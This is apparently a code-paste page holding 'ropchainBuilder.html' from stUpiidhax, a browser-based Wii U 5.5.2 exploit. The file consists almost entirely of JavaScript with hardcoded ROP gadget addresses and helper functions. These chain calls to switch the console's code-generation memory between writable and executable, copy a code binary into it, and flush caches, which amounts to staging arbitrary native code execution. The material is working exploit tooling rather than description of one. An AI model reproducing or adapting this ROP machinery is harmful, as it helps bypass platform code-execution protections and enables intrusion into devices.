stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

ropchainBuilder.html 4.0KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131
  1. <!--
  2. This is just something for me to use a console on chrome to form ROP chains
  3. -->
  4. <script>
  5. //Rop offset
  6. {
  7. ROP_POPJUMPLR_STACK12 = 0x0101cd24;
  8. ROP_POPJUMPLR_STACK20 = 0x01024d88;
  9. ROP_CALLFUNC = 0x01080274;
  10. ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
  11. ROP_POP_R28R29R30R31 = 0x0101d8d4;
  12. ROP_POP_R27 = 0x0101cb00;
  13. ROP_POP_R24_TO_R31 = 0x010204c8;
  14. ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
  15. ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
  16. ROP_memcpy = 0x01035fc8;
  17. ROP_DCFlushRange = 0x01023f88;
  18. ROP_ICInvalidateRange = 0x010240b0;
  19. ROP_OSSwitchSecCodeGenMode = 0x010376c0;
  20. ROP_OSCodegenCopy = 0x010376d8;
  21. ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
  22. ROP_OSGetCoreId = 0x01024e8c;
  23. ROP_OSGetCurrentThread = 0x01043150;
  24. ROP_OSSetThreadAffinity = 0x010429dc;
  25. ROP_OSYieldThread = 0x010418e4;
  26. ROP_OSFatal = 0x01031618;
  27. ROP_Exit = 0x0101cd80;
  28. ROP_OSScreenFlipBuffersEx = 0x0103afd0;
  29. ROP_OSScreenClearBufferEx = 0x0103b090;
  30. ROP_OSDynLoad_Acquire = 0x0102a3b4;
  31. ROP_OSDynLoad_FindExport = 0x0102b828;
  32. ROP_os_snprintf = 0x0102f160;
  33. }
  34. //Rop helper
  35. {
  36. var ab = new ArrayBuffer(0x10000);
  37. var ropCurrentDv = new DataView(ab)
  38. var ropChain = new Uint32Array(ab);
  39. var ropCurrentOffset = 0;
  40. function ropchain_appendu32(val)
  41. {
  42. ropCurrentDv.setUint32(ropCurrentOffset, val);
  43. ropCurrentOffset += 4;
  44. }
  45. function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
  46. {
  47. ropchain_appendu32(ROP_POP_R24_TO_R31);
  48. ropchain_appendu32(0x0);
  49. ropchain_appendu32(0x0);
  50. ropchain_appendu32(r24);
  51. ropchain_appendu32(r25);
  52. ropchain_appendu32(r26);
  53. ropchain_appendu32(r27);
  54. ropchain_appendu32(r28);
  55. ropchain_appendu32(r29);
  56. ropchain_appendu32(r30);
  57. ropchain_appendu32(r31);
  58. ropchain_appendu32(0x0);
  59. }
  60. function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
  61. {
  62. ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
  63. ropchain_appendu32(ROP_CALLFUNC);
  64. ropchain_appendu32(r28);//r28
  65. ropchain_appendu32(0x0);//r29
  66. ropchain_appendu32(0x0);//r30
  67. ropchain_appendu32(0x0);//r31
  68. ropchain_appendu32(0x0);
  69. }
  70. function ropgen_switchto_core1()
  71. {
  72. ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
  73. ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
  74. ropchain_appendu32(ROP_OSYieldThread);//r28
  75. ropchain_appendu32(0x0);//r29
  76. ropchain_appendu32(0x0);//r30
  77. ropchain_appendu32(0x0);//r31
  78. ropchain_appendu32(0x0);
  79. ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
  80. ropchain_appendu32(0x0);//r28
  81. ropchain_appendu32(0x0);//r29
  82. ropchain_appendu32(0x0);//r30
  83. ropchain_appendu32(0x0);//r31
  84. ropchain_appendu32(0x0);
  85. }
  86. function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
  87. {
  88. ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
  89. }
  90. function ropgen_memcpy(dst, src, size)
  91. {
  92. ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
  93. }
  94. function ropgen_DCFlushRange(addr, size)
  95. {
  96. ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
  97. }
  98. function ropgen_ICInvalidateRange(addr, size)
  99. {
  100. ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
  101. }
  102. function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
  103. {
  104. ropgen_OSSwitchSecCodeGenMode(0);
  105. ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
  106. ropgen_OSSwitchSecCodeGenMode(1);
  107. ropgen_DCFlushRange(codegen_addr, codebin_size);
  108. ropgen_ICInvalidateRange(codegen_addr, codebin_size);
  109. }
  110. }
  111. </script>